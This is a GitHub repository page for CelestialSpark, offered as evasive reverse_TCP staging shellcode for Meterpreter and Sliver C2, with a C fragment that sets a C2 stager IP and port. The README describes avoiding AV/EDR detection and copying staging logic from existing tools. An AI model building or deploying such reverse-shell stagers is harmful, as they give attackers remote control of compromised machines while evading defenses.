Skip to content

A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

Notifications You must be signed in to change notification settings

Karkas66/CelestialSpark

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CelestialSpark

A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

#include <Common.h>
#include <Constexpr.h>
#pragma comment(lib, "ws2_32.lib")

LPWSTR* arglist;
// Define IP Adress of your C2 Stager (!)
#define IP_STR  "10.10.10.10"
// Define PORT 443 of your TCP Stager
#define PORT 443
...

Why

I wanted to improve my understanding of position independent Shellcode, plus... My Meterpreter reverse_TCP Stager gets caught by a lot of AV/EDRs and I was hoping to somehow get around the IoCs the 15 year old Meterpreter reverse_TCP Shellcode generated by msfvenom. Inspirations were:

How does it work

  • not existing HTONS and HTONL functions have been hardcoded
  • custom inet_addr function was rewritten and implemented in Main.C
  • Socket creation and interaction functions have been imported from ws2_32.dll
  • Meterpreter Staging Logic hase been copied from the original project and TinyMet

Usage

About

A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages